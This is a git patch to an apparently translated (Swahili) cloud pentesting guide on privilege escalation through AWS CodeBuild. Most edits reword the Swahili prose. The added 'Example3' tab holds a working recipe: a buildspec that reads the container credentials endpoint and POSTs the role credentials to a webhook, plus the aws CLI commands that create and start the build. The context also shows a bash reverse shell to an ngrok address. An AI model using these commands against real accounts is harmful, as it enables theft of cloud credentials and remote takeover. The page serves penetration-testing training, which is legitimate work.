From 243dc8ca1e3a90e236d35eebead3448ecbd559ef Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 8 Jan 2025 20:44:45 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/aws-security/aws-privilege-escalation/ --- .../aws-codebuild-privesc.md | 46 ++++++++++++++++--- 1 file changed, 40 insertions(+), 6 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md index 8f2991033..72a3c6528 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md @@ -61,7 +61,7 @@ aws codebuild start-build-batch --project --buildspec-override fi **Kumbuka**: Tofauti kati ya amri hizi mbili ni kwamba: - `StartBuild` inachochea kazi moja ya kujenga kwa kutumia `buildspec.yml` maalum. -- `StartBuildBatch` inakuwezesha kuanzisha kundi la ujenzi, kwa mipangilio tata zaidi (kama kuendesha ujenzi kadhaa kwa wakati mmoja). +- `StartBuildBatch` inakuwezesha kuanzisha kundi la ujenzi, ikiwa na mipangilio tata zaidi (kama kuendesha ujenzi kadhaa kwa wakati mmoja). **Athari Zinazoweza Kutokea:** Privesc moja kwa moja kwa majukumu ya AWS Codebuild yaliyoambatanishwa. @@ -133,6 +133,40 @@ aws codebuild create-project --name reverse-shell-project --source type=S3,locat # Start a build with the new project aws codebuild start-build --project-name reverse-shell-project +``` +{{#endtab }} + +{{#tab name="Example3" }} +```bash +# Generated by ex16x41, tested +# Create a hook.json file with command to send output from curl credentials URI to your webhook address + +{ +"name": "user-project-1", +"source": { +"type": "NO_SOURCE", +"buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - curl \"http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\" | curl -X POST -d @- WEBHOOK URL\n" +}, +"artifacts": { +"type": "NO_ARTIFACTS" +}, +"environment": { +"type": "LINUX_CONTAINER", +"image": "public.ecr.aws/codebuild/amazonlinux2-x86_64-standard:4.0", +"computeType": "BUILD_GENERAL1_SMALL" +}, +"serviceRole": "ARN-OF-TARGET-ROLE" +} + +# Create a new CodeBuild project with the hook.json file +aws codebuild create-project --cli-input-json file:///tmp/hook.json + +# Start a build with the new project +aws codebuild start-build --project-name user-project-1 + +# Get Credentials output to webhook address +Wait a few seconds to maybe a couple minutes and view the POST request with data of credentials to pivot from + ``` {{#endtab }} {{#endtabs }} @@ -142,11 +176,11 @@ aws codebuild start-build --project-name reverse-shell-project > [!WARNING] > Katika **konteina ya Codebuild** faili `/codebuild/output/tmp/env.sh` ina kila mabadiliko ya env yanayohitajika kufikia **akiba ya metadata**. -> Faili hii ina **mabadiliko ya env `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** ambayo ina **njia ya URL** ya kufikia akiba. Itakuwa kama hii `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` +> Faili hii ina **mabadiliko ya env `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** ambayo ina **njia ya URL** ya kufikia akiba. Itakuwa kitu kama hii `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` > Ongeza hiyo kwenye URL **`http://169.254.170.2/`** na utaweza kudump akiba ya jukumu. -> Zaidi ya hayo, pia ina **mabadiliko ya env `ECS_CONTAINER_METADATA_URI`** ambayo ina URL kamili ya kupata **habari za metadata kuhusu konteina**. +> Zaidi ya hayo, pia ina **mabadiliko ya env `ECS_CONTAINER_METADATA_URI`** ambayo ina URL kamili ya kupata **taarifa za metadata kuhusu konteina**. ### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) @@ -268,7 +302,7 @@ aws codebuild start-build-batch --project-name codebuild-demo-project ### SSM -Kuwa na **idhini ya kutosha kuanzisha kikao cha ssm** inawezekana kupata **ndani ya mradi wa Codebuild** unaojengwa. +Kuwa na **idhini za kutosha kuanzisha kikao cha ssm** inawezekana kupata **ndani ya mradi wa Codebuild** unaojengwa. Mradi wa codebuild utahitaji kuwa na breakpoint: @@ -317,13 +351,13 @@ build: commands: - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1 ``` -**Impact:** Privesc ya moja kwa moja kwa jukumu linalotumiwa na mfanyakazi wa AWS CodeBuild ambalo mara nyingi lina mamlaka ya juu. +**Impact:** Moja kwa moja privesc kwa jukumu lililotumiwa na mfanyakazi wa AWS CodeBuild ambalo mara nyingi lina mamlaka ya juu. > [!WARNING] > Kumbuka kwamba buildspec inaweza kutarajiwa kuwa katika muundo wa zip, hivyo mshambuliaji atahitaji kupakua, kufungua, kubadilisha `buildspec.yml` kutoka kwenye saraka ya mzizi, kuzipa tena na kupakia. Maelezo zaidi yanaweza kupatikana [here](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/). -**Potential Impact:** Privesc ya moja kwa moja kwa majukumu ya AWS Codebuild yaliyoambatanishwa. +**Potential Impact:** Moja kwa moja privesc kwa majukumu ya AWS Codebuild yaliyoambatanishwa. {{#include ../../../banners/hacktricks-training.md}}